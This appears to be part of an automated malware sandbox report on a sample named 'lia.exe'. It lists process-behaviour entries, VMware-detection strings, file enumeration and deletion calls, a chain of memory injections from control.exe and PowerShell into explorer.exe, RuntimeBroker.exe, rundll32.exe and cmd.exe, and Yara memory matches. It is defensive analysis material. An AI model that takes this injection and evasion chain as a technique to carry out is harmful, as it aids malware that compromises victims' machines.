Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\control.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: explorer.exe, 00000016.00000000.508063004.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000 |
Source: explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0 |
Source: explorer.exe, 00000016.00000000.506696613.00000000062E0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00 |
Source: RuntimeBroker.exe, 00000021.00000000.563490355.0000021DB5A53000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 00000016.00000000.506696613.00000000062E0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 00000016.00000000.542857487.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}> |
Source: RuntimeBroker.exe, 00000024.00000000.640630745.0000021910A2A000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l |
Source: mshta.exe, 0000000B.00000003.423217219.000002480E9FE000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ |
Source: explorer.exe, 00000016.00000000.542857487.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000 |
Source: explorer.exe, 00000016.00000000.508063004.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-; |
Source: explorer.exe, 00000016.00000000.521348094.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039F2ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039EB9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039DE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036BE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036CB9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036D2ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, |
Source: C:\Users\user\Desktop\lia.exe | Memory written: C:\Windows\System32\control.exe base: 7FF6924512E0 |
Source: C:\Users\user\Desktop\lia.exe | Memory written: C:\Windows\System32\control.exe base: 5D0000 |
Source: C:\Users\user\Desktop\lia.exe | Memory written: C:\Windows\System32\control.exe base: 7FF6924512E0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 5EA000 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 850000 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 5E8000 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: A90000 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FF425FD0 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 215F44A0000 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FF425FD0 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 515ACF4000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 789A650000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 219109E0000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: ECB1F3A000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DACE190000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: D9724C4000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26E95750000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 2B6FC0 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 3300000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 2B6FC0 |
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute read |
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.493442735.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.558340773.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.517558095.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.507991039.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.533591545.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd |
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491157547.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.521122130.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.527432058.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.543730981.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.495158244.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp | Binary or memory string: Progman |
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp | Binary or memory string: &Program Manager |
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp | Binary or memory string: Progmanlock |
Source: Yara match | File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
